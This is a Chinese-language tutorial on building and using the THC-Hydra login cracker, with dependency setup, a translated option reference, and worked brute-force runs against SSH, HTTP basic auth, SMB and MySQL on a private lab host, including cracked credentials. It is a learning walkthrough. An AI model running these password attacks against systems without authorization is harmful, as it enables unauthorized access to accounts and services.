thc--hydra暴力破解
http://www.oracle.com/technetwork/database/features/instant-client/index.html
http://www.oracle.com/technetwork/topics/linuxx86-64soft-092277.html
Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast.
Hydra was tested to compile on Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1, OpenBSD, OSX, QNX/Blackberry, and is made available under GPLv3 with a special OpenSSL license expansion.
Currently this tool supports: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, S7-300, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP. For HTTP, POP3, IMAP and SMTP, several login mechanisms like plain and MD5 digest etc. are supported.
This tool is a proof of concept code, to give researchers and security consultants the possiblity to show how easy it would be to gain unauthorized access from remote to a system.
Ubuntu/Debian: apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev libncurses5-dev
OpenSuSE: zypper install libopenssl-devel pcre-devel libidn-devel ncpfs-devel libssh-devel postgresql-devel subversion-devel libncurses-devel
OS X: brew install libssh openssl mysql gtk+ pkg-config libidn
telnet
不过电影还是电影,留心的朋友可能注意到,里面用的是个私网地址192.168.1.100,还用的是Dos操作系统C:\
22:31:51,注意,朋友们,仅仅用了1分钟,就成功暴力破解了如此复杂的密码(alex/AleX210LEun)。我只能说,此电脑堪比天河超算,用户名和密码都是字典呀,有木有
cat
>/etc/yum.repos.d/epel7.repo <<HERE
[epel7]
name=epel
baseurl=http://mirrors.sohu.com/fedora-epel/7/x86_64/
gpgcheck=0
enabled=1
HERE
yum -y install openssl-devel pcre-devel postgresql-devel
libssh-devel subversion-devel
ncurses-devel firebird-devel
libodb-mysql-devel openldap-devel
mariadb-devel afpfs-ng-devel (ncpfs-devel)
yum -y install hydra hydra-frontend
1.安装编译依赖库
[epel7]
name=epel
baseurl=http://mirrors.sohu.com/fedora-epel/7/x86_64/
gpgcheck=0
enabled=1
HERE
yum -y install openssl-devel pcre-devel postgresql-devel
libssh-devel subversion-devel ncurses-devel
firebird-devel libodb-mysql-devel openldap-devel
mariadb-devel afpfs-ng-devel
sap需要到官网下载对应版本的SDK,有兴趣的朋友可以试试
install
root@jlive:hydra-8.1#./configure
Starting hydra auto configuration …
Detected 64 Bit Linux OS
Checking for openssl (libssl, libcrypto, ssl.h, sha.h) …
… found
Checking for idn (libidn.so) …
…
found
Checking for curses (libcurses.so / term.h) …
… found, color output enabled
Checking for pcre (libpcre.so, pcre.h) …
… found
Checking for Postgres (libpq.so, libpq-fe.h) …
… found
Checking for SVN (libsvn_client-1 libapr-1.so libaprutil-1.so)
…
… found
Checking for firebird (libfbclient.so) …
… found
Checking for MYSQL client (libmysqlclient.so, math.h) …
…
found
Checking for AFP (libafpclient.so) …
…
found
Checking for NCP (libncp.so / nwcalls.h) …
… NOT
found, module NCP disabled
Checking for SAP/R3 (librfc/saprfc.h) …
… NOT found, module sapr3 disabled
Get it from
http://www.sap.com/solutions/netweaver/linux/eval/index.asp
Checking for libssh (libssh/libssh.h) …
… found
Checking for Oracle (libocci.so libclntsh.so / oci.h and libaio.so)
…
… NOT found, module Oracle disabled
Get basic and sdk package from
http://www.oracle.com/technetwork/database/features/instant-client/index.html
Checking for GUI req\’s (pkg-config, gtk+-2.0) …
… found
Checking for Android specialities …
… rindex() found
… RSA_generate_key()
found
Checking for secure compile option support in gcc …
Compiling… yes
Linking… yes
Hydra will be installed into …/bin of: /usr/local
(change this by running ./configure
–prefix=path)
Writing Makefile.in …
now type “make”
安装完成后会多出如下几个命令
hydra hydra-wizard.sh xhydra
使用实例
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e
ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT]
[-S] [-vV] server service [OPT]
-R 继续从上一次进度接着破解。
-S 采用SSL链接。
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户,对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。
-P FILE 大写,指定密码字典。
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数,默认为16。
-w TIME 设置最大超时的时间,单位秒,默认是30s。
-v / -V 显示详细过程。
server 目标ip
service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt
http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable
vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5
rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm]
pcanywhere teamspeak sip vmauthd firebird ncp afp等等。
OPT 可选项
用户名和密码字典,可以使用linux自带的字典库/usr/share/dict/linux.words
或者使用字典生成器,如crunch http://sourceforge.net/projects/crunch-wordlist/files/
tar -xvf crunch-3.6.tar.gz -C /usr/local/src
cd /usr/local/src/crunch-3.6
make -j4 && make -j4 install
语法:Syntax: hydra [[[-l LOGIN|-L
FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS]
[-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x
MIN:MAX:CHARSET] [-SuvVd46]
[service://server[:PORT][/OPT]]
如, hydra -L
user.txt -P pw.txt mysql://192.168.130.254:3306
又或者
1.ssh破解
root@jlive:~#hydra
-l root -P pw.txt -t 4 -e nsr
192.168.130.254 ssh
Hydra v8.1 (c) 2014 by van Hauser/THC – Please do not use in
military or secret service organizations, or for illegal
purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-01-31
16:32:59
[DATA] max 4 tasks per 1 server, overall 64 tasks, 39 login tries
(l:1/p:39), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh]
host: 192.168.130.254
login: root
password: root
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-01-31
16:33:02
找到正确的密码后立刻停止
图形化前端xhydra
可以看到,密码被成功暴力破解,当然,只是测试
2.http
basic认证–get方式
root@jlive:~#hydra
-l liujun -P pw.txt -t 4 -e nsr 192.168.130.254 http-get /nginx_status
Hydra v8.1 (c) 2014 by van Hauser/THC – Please do not use in
military or secret service organizations, or for illegal
purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-01-31
17:45:24
[DATA] max 4 tasks per 1 server, overall 64 tasks, 41 login tries
(l:1/p:41), ~0 tries per task
[DATA] attacking service http-get on port 80
[80][http-get]
host: 192.168.130.254
login: liujun
password: LIUJUN
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-01-31
17:45:24
3.smb破解
root@jlive:~#hydra
-l liujun -P pw.txt 192.168.130.254 smb -s
445
Hydra v8.1 (c) 2014 by van Hauser/THC – Please do not use in
military or secret service organizations, or for illegal
purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-01-31
18:26:03
[INFO] Reduced number of tasks to 1 (smb does not like parallel
connections)
[DATA] max 1 task per 1 server, overall 64 tasks, 40 login tries
(l:1/p:40), ~0 tries per task
[DATA] attacking service smb on port 445
[445][smb]
host: 192.168.130.254
login: liujun
password: ^LIUjun$90
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-01-31
18:26:03
4.mysql密码破解
root@jlive:~#hydra
-L user.txt -P pw.txt 192.168.130.254 mysql -s 3306
Hydra v8.1 (c) 2014 by van Hauser/THC – Please do not use in
military or secret service organizations, or for illegal
purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-01-31
18:53:10
[INFO] Reduced number of tasks to 4 (mysql does not like many
parallel connections)
[DATA] max 4 tasks per 1 server, overall 64 tasks, 80 login tries
(l:2/p:40), ~0 tries per task
[DATA] attacking service mysql on port 3306
[3306][mysql]
host: 192.168.130.254
login: jlive
password: liujun
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-01-31
18:53:10
说明:为了演示效果,密码库里直接填入了正确的密码,所以非常快地就破出了密码